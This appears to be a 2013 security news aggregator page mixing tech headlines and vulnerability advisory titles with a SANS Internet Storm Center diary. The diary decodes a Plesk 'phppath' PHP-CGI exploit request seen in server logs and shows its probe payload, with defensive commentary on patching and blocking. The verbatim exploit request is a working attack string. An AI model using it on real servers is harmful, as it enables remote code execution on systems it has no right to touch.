Hackin9
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
A variety of network-controlled home automation devices lack basic security controls, making it possible for attackers to access their sensitive functions, often from the Internet, according to researchers from security firm Trustwave.
 
Researchers in the U.S. have managed to spoof GPS (Global Positioning System) signals to send a yacht hundreds of meters off course, while fooling the crew into thinking the yacht was remaining perfectly on course.
 

The Trials of Bradley Manning
The Nation.
There was no security to speak of at the SCIF (sensitive compartmented information facility) at FOB Hammer, where the “infosec” (information security) protocols were casually flouted with the full knowledge of supervisors. This was not an anomaly: 1.4 ...

and more »
 

Thanks to a reader for sending in this log entry from his Apache Server:

POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E
%63%6C%75%64%65%3D%6F
%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E
%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E
%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F
%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1

Russ quickly decoded it to:

/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -nT

This appears to be an exploit attempt against Plesk, a popular hosting management platform. A patch for this vulnerability was released in June [1]. We covered the vulnerability before, but continue to see exploit attempts like above. The exploit takes advantage of a configuration error, creating the  script alias "phppath" that can be used to execute shell commands via php. The exploit above runs a little shell one-liner that accomplishes the following:

  • allow URL includes to include remote files
  • turn off safe mode to disable various protections
  • turn of the suhosin patch (turn it into "simulation mode" so it doesn't block anything
  • set the "disabled function" to an empty string to overwrite any such setting in your php configuration file
  • and autoprepending "php://input", which will execute any php scripts submitted as part of the body of this request

Please let us know if you are able to capture the body of the request!

Thanks to another reader for submitting a packet capture of a full request:

The Headers:

Host: <IP Address>
Content-Type: application/x-ww-forum-urlencoded
Content-Lenght: 64

<?php echo "Content-Type: text/html\r\n\r\n"; echo "___2pac\n"; ?>

This payload will just print the string ___2pac, likely to detect if the vulnerability exists. No user agent is sent, which should make it easy to block these requests using standard mod_security rules.

 

[1] http://kb.parallels.com/en/116241
[2] https://isc.sans.edu/diary/Plesk+0-day+Real+or+not+/15950

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
RETIRED: YUI CVE-2013-4939 Multiple Cross-Site Scripting Vulnerabilities
 
Researchers in Silicon Valley have managed to observe electrical switching that is thousands of times faster than transistors used in today's computer chips. Their work could lead to a better understanding of how transistors work at the atomic level and in turn help to enable more powerful computers.
 
Marvell joined the crowd of vendors throwing their support behind Googles TV streaming device, Chromecast, saying its hardware powers the new device.
 
Intel has shipped its first "open source PC," a bare-bones computer aimed at software developers building x86 applications and hobbyists looking to construct their own computer.
 
Corning has had much success in getting its Gorilla Glass adopted by smartphone and tablet makers. Now it's aiming for laptops.
 
Ready to quietly mug your network: the Pwn Plug R2.
Pwnie Express

Tomorrow at the Black Hat security conference in Las Vegas, the Pwnie Express will officially unleash Pwn Plug R2, the next generation in its arsenal of penetration testing and hacking hardware. Ars got an exclusive rundown in advance on the device from Dave Porcello, founder and CEO of Pwnie Express.

The new Pwn Plug looks less like a DC power supply plug—the form factor of its predecessor—and more like a small Wi-Fi access point or router. But inside, it's really a Linux-powered NSA-in-a-box, providing white hat hackers and corporate network security professionals a "drop box" system that can be remotely controlled over a covert Internet channel or a cellular data connection.

"Some people will use these for physical penetration tests," Porcello said. "They can go into a bank branch or a retail store, or even a corp office, and pretend to be a telecom technician or someone from the power company, or whatever, and drop it under someone's desk, or in a wiring closet, or behind a printer." And for other applications, such as corporate security auditing, Porcello said, "it's just as useful to send to remote sites without having to travel—a corporate security manager can just ship a box out to a retail store and have a store manager or branch manager just plug it in."

Read 15 remaining paragraphs | Comments

    


 
YUI CVE-2013-4939 Multiple Cross-Site Scripting Vulnerabilities
 
Wireshark Multiple Denial of Service Vulnerabilities
 
For ARI CEO Carl Ortell, real-time information delivery is key to strong relationships with customers and employees.
 
Microsoft today said that Windows 8.1, slated for release this fall, will use the same lifecycle support timeline as 2012's Windows 8, meaning that it will be supported until early 2023.
 
Facebook today announced a pilot program aimed at helping developers take their mobile games global.
 

thank you

 
Both Apple- and Windows-branded tablets lost market share in the second quarter, each retreating in the face of increased pressure from Android, a market research analyst said today.
 
Even Asus, which makes the VivoTab RT tablet, isn't impressed with the sales results of Microsoft Windows RT-based tablets.
 
Samsung is reportedly in talks to acquire German organic light-emitting diode (OLED) technology developer Novaled.
 
Lenovo will open its Reach consumer cloud service beta to anyone who wants to sign up later this quarter in North America, which could boost the Chinese company's hardware sales by tying that portfolio to the cloud service.
 
Oracle has settled a lawsuit it brought last year against a former partner it alleged was providing third-party support for its PeopleSoft application in an illegal fashion.
 
If it wasn't already apparent, next-generation Windows RT tablets are not getting support from any tablet maker other than Microsoft itself.
 
The Massachusetts Institute of Technology never sought a federal prosecution of Aaron Swartz, the programming prodigy who was charged with stealing millions of academic papers from an online archive at MIT, according to a report by the institute.
 
Military Judge Col. Denise Lind has acquitted Private First Class Bradley Manning of aiding U.S. enemies, but found him guilty of most lesser charges related to leaking secret documents to WikiLeaks.
 
This CIO wants IT employees who are dedicated to the company's mission of using IT to fight healthcare fraud and waste.
 
NGS00500 Technical Advisory: Bit51 Better WP Security Plugin - Unauthenticated Stored XSS to RCE
 
Red Hat Directory Server and 389 Directory Server CVE-2013-2219 Access Bypass Vulnerability
 
[ MDVSA-2013:204 ] wireshark
 
MojoPortal XSS
 
[ MDVSA-2013:203 ] phpmyadmin
 
Elemata CMS 'id' Parameter SQL Injection Vulnerability
 
Mintboard Multiple Cross Site Scripting Vulnerabilities
 
Top Games Script 'play.php' SQL Injection Vulnerability
 
The U.S. smartphone market is about to get more crowded, as Asustek Computer -- maker of the Nexus 7 tablet -- could have an entry as early as 2014.
 
Easing the path for organizations to launch big data-styled services, Red Hat has coupled the 10gen MongoDB data store to its new identity management package for the Red Hat Enterprise Linux (RHEL) distribution.
 
WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities
 
WorldCIST'14 - World Conference on IST, 15 - 18 April 2014, at Madeira Island
 
[SECURITY] [DSA 2731-1] libgcrypt11 security update
 
[SECURITY] [DSA 2730-1] gnupg security update
 
[security bulletin] HPSBGN02904 rev.1 - HP SiteScope running SOAP, Remote Code Execution
 
The CIO of the largest privately held spirits company in the world stays close to customers and recently deployed an iPad app that explains the rich history of its brands.
 
Salesforce.com has expanded the number of mobile application development tools it supports and also created a series of templates aimed at helping coders create mobile applications faster.
 
How do you find the right IT consultant for your business and specific IT needs? IT executives share their tips and advice on finding the right IT consultant for your organization. We also suggest five questions you should ask all prospective candidates.
 
phpMyAdmin Multiple SQL Injection and Cross Site Scripting Vulnerabilities
 

Remote Workers' Success Starts With IT Support
Fox Business
Allan Pratt, an InfoSec strategist and Computing Technology Industry Association (CompTIA) certification instructor, said that if employees spend a great deal of time traveling or working in public work spaces, it is best to invest in VPN. "VPNs can be ...

 
Sprint Nextel reported made a $1.6 billion loss in the second quarter, swollen by the cost of shutting down its Nextel wireless network, but the company is more optimistic about future profitability.
 
The company could rediscover relevance because it understands that the companies using its cloud services require flexibility first and foremost.
 
In the two years it's been around, Google+ has both grown and changed. In the first of three "how-to" guides, we tell you how to get started.
 
In the ongoing quest for faster access to data, Diablo Technologies has taken what could be a significant next step.
 
The announcement appeared in small text on the Russian president's website: 'Let me speak from my heart: Edward Snowden is a Russian Citizen. Thanks to @homakov!';
 
Startup Muzik today announced its first headphones, which it said will be able to instantly post the music users are listening to on Twitter and Facebook as well as learn the music you like and create playlists.
 
What if the NSA took your text message metadata and made a flowing, colorful diagram with a timeline?
 
HTC plans to introduce a series of mid-tier and entry-level smartphones later this year as a way to regain market share, after posting disappointing financial results in the second quarter.
 
Microsoft is expanding the push for so-called 'white spaces' broadband to South Africa, where it will help to deploy the technology in a pilot project serving five primary and secondary schools.
 
PineApp Mail-SeCure 'test_li_connection.php' Remote Command Injection Vulnerability
 
PineApp Mail-SeCure 'ldapsyncnow.php' Remote Command Injection Vulnerability
 
PineApp Mail-SeCure 'livelog.html' Remote Command Injection Vulnerability
 

Posted by InfoSec News on Jul 30

http://healthitsecurity.com/2013/07/29/ohsu-alerts-patients-of-google-cloud-security-concerns/

By Patrick Ouellette
HealthITSecurity.com
July 29, 2013

In a rare data patient privacy issue involving patient data stored in the
cloud, Oregon Health and Science University (OHSU) alerted 3,044 patients
on July 26 that it had stored their data using a non-business associate
(BA) in Internet-based service provider Google.

According OHSU, Google...
 

Posted by InfoSec News on Jul 30

http://www.theguardian.com/technology/2013/jul/30/car-hacking-ignition-injunction

By Lisa O'Carroll
theguardian.com
30 July 2013

The University of Birmingham says it will defer any publication of an
academic paper which reveals secret codes to bypass the security on
top-end cars including Porsches and Bentleys following a high court
injunction.

It said it was "disappointed" with the judgement in a statement following
the...
 

Posted by InfoSec News on Jul 30

http://news.cnet.com/8301-1009_3-57596053-83/nasa-falls-short-on-its-cloud-computing-security/

By Dara Kerr
Security & Privacy CNET News
July 29, 2013

In its move to cloud computing, NASA has experienced some difficulties
meeting security guidelines. A new report by the agency's Office of the
Inspector General says that NASA needs to work on strengthening its
information technology security practices.

"We found that weaknesses...
 

Posted by InfoSec News on Jul 30

http://www.v3.co.uk/v3-uk/news/2285459/nato-urges-military-to-recruit-white-hat-hacker-army-to-boost-defences

By Alastair Stevenson
V3.co.uk
29 Jul 2013

Nato has called for military and private industry to recruit more ethical
hackers, listing their skills as an essential weapon in its ongoing
anti-black hat war.

Nato deputy assistant secretary general Jamie Shea issued the statement in
video review exploring the ethical hacking community....
 

Posted by InfoSec News on Jul 30

http://www.theregister.co.uk/2013/07/29/symantec_web_gateway_vulns_fixed/

By John Leyden
The Register
29th July 2013

Symantec has plugged a series of critical flaws in its Web Gateway appliances
which included a backdoor permitting remote code execution on targeted
systems.

The flaws, discovered during a short crash test by security researchers at
Austrian firm SEC Consult, created a means to execute code with root
privileges - or the...
 
Oracle Java SE CVE-2013-2470 Memory Corruption Vulnerability
 
ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
 
Internet Storm Center Infocon Status